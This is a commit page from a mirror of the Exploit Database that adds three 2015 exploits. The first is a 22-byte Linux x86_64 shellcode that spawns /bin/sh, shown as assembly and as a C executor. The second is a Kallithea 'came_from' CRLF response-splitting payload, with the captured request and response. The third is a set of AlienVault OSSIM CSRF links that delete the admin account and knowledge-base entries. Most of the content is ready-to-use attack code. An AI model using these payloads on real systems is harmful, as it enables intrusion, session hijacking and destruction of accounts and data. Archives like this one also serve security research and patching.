bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-10-12

Browse source 
3 new exploits
This commit is contained in:
Offensive Security 2015-10-12 05:03:25 +00:00
parent e1e1cec457
commit 93528f9a40
4 changed files with 169 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
files.csv
View file

@ -34536,6 +34536,7 @@ id,file,description,date,author,platform,type,port
38236,platforms/php/webapps/38236.txt,"gpEasy CMS 'section' Parameter Cross Site Scripting Vulnerability",2013-01-23,"High-Tech Bridge SA",php,webapps,0 38236,platforms/php/webapps/38236.txt,"gpEasy CMS 'section' Parameter Cross Site Scripting Vulnerability",2013-01-23,"High-Tech Bridge SA",php,webapps,0
38237,platforms/php/webapps/38237.txt,"WordPress Chocolate WP Theme Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0 38237,platforms/php/webapps/38237.txt,"WordPress Chocolate WP Theme Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0
38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection Vulnerabilities",2013-01-25,AkaStep,php,webapps,0 38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection Vulnerabilities",2013-01-25,AkaStep,php,webapps,0
38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux x86_64 execve Shellcode - 22 bytes",2015-09-18,d4sh&r,lin_x86-64,shellcode,0
38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash PoC",2015-09-18,spyk,windows,dos,0 38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash PoC",2015-09-18,spyk,windows,dos,0
38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80 38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80
38242,platforms/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",hardware,remote,0 38242,platforms/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",hardware,remote,0
@ -34685,6 +34686,7 @@ id,file,description,date,author,platform,type,port
38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard '.PLF' File Remote Buffer Overflow Vulnerability",2013-03-19,metacom,windows,remote,0 38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard '.PLF' File Remote Buffer Overflow Vulnerability",2013-03-19,metacom,windows,remote,0
38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080 38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080
38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0
38400,platforms/php/webapps/38400.txt,"AlienVault OSSIM - CSRF Vulnerabilities",2015-10-05,"MohamadReza Mohajerani",php,webapps,0
38403,platforms/win32/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win32,local,0 38403,platforms/win32/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win32,local,0
38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0
38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack-Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack-Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0
@ -34706,6 +34708,7 @@ id,file,description,date,author,platform,type,port
38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability",2013-04-05,anonymous,linux,dos,0 38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability",2013-04-05,anonymous,linux,dos,0
38422,platforms/linux/dos/38422.txt,"Apache Subversion Remote Denial of Service Vulnerability",2013-04-05,"Greg McMullin",linux,dos,0 38422,platforms/linux/dos/38422.txt,"Apache Subversion Remote Denial of Service Vulnerability",2013-04-05,"Greg McMullin",linux,dos,0
38423,platforms/windows/local/38423.py,"VeryPDF Image2PDF Converter SEH Buffer Overflow",2015-10-08,"Robbie Corley",windows,local,0 38423,platforms/windows/local/38423.py,"VeryPDF Image2PDF Converter SEH Buffer Overflow",2015-10-08,"Robbie Corley",windows,local,0
38424,platforms/multiple/webapps/38424.txt,"Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability",2015-10-08,LiquidWorm,multiple,webapps,0
38425,platforms/php/webapps/38425.txt,"PHP Address Book /addressbook/register/delete_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38425,platforms/php/webapps/38425.txt,"PHP Address Book /addressbook/register/delete_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
38426,platforms/php/webapps/38426.txt,"PHP Address Book /addressbook/register/edit_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38426,platforms/php/webapps/38426.txt,"PHP Address Book /addressbook/register/edit_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
38427,platforms/php/webapps/38427.txt,"PHP Address Book /addressbook/register/edit_user_save.php Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38427,platforms/php/webapps/38427.txt,"PHP Address Book /addressbook/register/edit_user_save.php Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0

Can't render this file because it is too large.

35
platforms/lin_x86-64/shellcode/38239.asm Executable file
View file

@ -0,0 +1,35 @@
;Title: execve shellcode 22 bytes
;Author: d4sh&r
;Contact: https://mx.linkedin.com/in/d4v1dvc
;Category: Shellcode
;Architecture:linux x86_64
;SLAE64-1379
;Description:
;Shellcode in 22 bytes to get a shell
;Tested on : Linux kali64 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 x86_64 GNU/Linux
;Compilation and execution
;nasm -felf64 shell.nasm -o shell.o
;ld shell.o -o shell
;./shell
global _start
_start:
mul esi
push rdx
mov rbx, 0x68732f2f6e69622f ;/bin//sh
push rbx
lea rdi, [rsp] ;address of /bin//sh
mov al, 59 ;execve
syscall
/*compile with gcc -fno-stack-protector -z exestack */
unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
main()
{
int (*ret)()=(int(*)()) code;
ret();
}

85
platforms/multiple/webapps/38424.txt Executable file
View file

@ -0,0 +1,85 @@

Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability
Vendor: Kallithea
Product web page: https://www.kallithea-scm.org
Version affected: 0.2.9 and 0.2.2
Summary: Kallithea, a member project of Software Freedom Conservancy,
is a GPLv3'd, Free Software source code management system that supports
two leading version control systems, Mercurial and Git, and has a web
interface that is easy to use for users and admins.
Desc: Kallithea suffers from a HTTP header injection (response splitting)
vulnerability because it fails to properly sanitize user input before
using it as an HTTP header value via the GET 'came_from' parameter in
the login instance. This type of attack not only allows a malicious
user to control the remaining headers and body of the response the
application intends to send, but also allow them to create additional
responses entirely under their control.
Tested on: Kali
Python
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5267
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
Vendor: https://kallithea-scm.org/news/release-0.3.html
Vendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html
CVE ID: 2015-5285
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285
21.09.2015
--
GET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Host: 192.168.0.28:8080
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.0.28:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438
###
HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
Location: http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress
<html>
<head>
<title>302 Found</title>
</head>
<body>
<h1>302 Found</h1>
The resource was found at <a href="http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk">http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk</a>;
you should be redirected automatically.
</body>
</html>

46
platforms/php/webapps/38400.txt Executable file
View file

@ -0,0 +1,46 @@
# Exploit Title: [AlienVault - ossim CSRF]
# Date: [10-5-2015]
# Exploit Author: [MohamadReza Mohajerani]
# Vendor Homepage: [www.alienvault.com]
# Software Link: [https://www.alienvault.com/products/ossim]
# Version: [Tested on 4.3]
Vulnerability Details:
=====================
Multiple CSRF vectors exists within AlienVault ossim allowing the following
attacks:
1)Delete user accounts(ex.admin account)
2)Delete knowledge DB items
Exploit code(s):
===============
The only thing the attacker needs to do is sending the following link to
the victim via GET request , if the victim authenticated on the ossim and
click on the link the following attacks can be occurred :
1)For deleting the
knowledge DB items just send the link below:
https://ossim-ip/ossim/repository/repository_delete.php?id_document=10232
[id_document is the item number which you want to delete (it starts from 1)]
2)For deleting the user accounts (ex.admin account) use the link below :
https://ossim-ip/ossim/session/deleteuser.php?user=admin&_=1444042812845
[the random number (1444042812845) is not important at all and you can
change the number to whatever you want]
Severity Level:
================
High